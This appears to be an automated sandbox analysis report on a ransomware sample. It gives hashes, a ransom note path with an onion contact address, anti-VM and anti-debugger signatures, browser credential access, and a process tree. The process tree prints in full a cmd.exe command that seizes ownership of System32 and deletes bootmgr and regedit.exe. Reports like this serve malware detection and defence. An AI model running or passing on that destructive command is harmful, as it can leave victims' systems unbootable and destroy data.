Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 13:55
Behavioral task
behavioral1
Sample
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
Resource
win7-20241010-en
General
-
Target
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
-
Size
3.1MB
-
MD5
6a85d0ba4d1db63d390b7a071d60e0ef
-
SHA1
79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
-
SHA256
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
-
SHA512
16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
-
SSDEEP
49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Renames multiple (202) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 2508 takeown.exe 1724 takeown.exe 2312 icacls.exe 2368 takeown.exe 2336 icacls.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 1724 takeown.exe 2312 icacls.exe 2368 takeown.exe 2336 icacls.exe 2508 takeown.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/576-27-0x0000000000B00000-0x0000000001330000-memory.dmp themida behavioral1/memory/576-26-0x0000000000B00000-0x0000000001330000-memory.dmp themida -
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exepid process 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exe369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeDebugPrivilege 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe Token: SeTakeOwnershipPrivilege 1724 takeown.exe Token: SeTakeOwnershipPrivilege 2368 takeown.exe Token: SeTakeOwnershipPrivilege 2508 takeown.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.execmd.exedescription pid process target process PID 576 wrote to memory of 1824 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 576 wrote to memory of 1824 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 576 wrote to memory of 1824 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 576 wrote to memory of 1824 576 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe cmd.exe PID 1824 wrote to memory of 1724 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 1724 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 1724 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 1724 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2312 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2312 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2312 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2312 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2368 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2368 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2368 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2368 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2336 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2336 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2336 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2336 1824 cmd.exe icacls.exe PID 1824 wrote to memory of 2508 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2508 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2508 1824 cmd.exe takeown.exe PID 1824 wrote to memory of 2508 1824 cmd.exe takeown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2368 -
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:2336 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2508
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f2bbb85d6112bd7360a4ddbc23ea9a8b
SHA1683eb7b2b0a5904337f204f71d25c02b9cc5daba
SHA256be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2
SHA512a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172
-
Filesize
16B
MD52caa6f3c95f6ec6bba5b54344938efa0
SHA12d5637f50e858fbaaeec7853d944dd3c3e91ec39
SHA25616ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6
SHA5124141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00
-
Filesize
11KB
MD57c4ebcaeaef5bc92e69c7cbd04600924
SHA1dda30896a3a1f6ce10ac046f236af1495fb93bc9
SHA256218849cd172e02725162943a6821b04b0315d9272d76af9b4a4b6cb58396187f
SHA5121e8ccc10960b52be94de50c19b4e5f2b60b6676b2a3b5a70d11a8bddfae2d6c396fe38fe6daf061768d8c3a72e58c64e07089ae6531e7522791c872707307291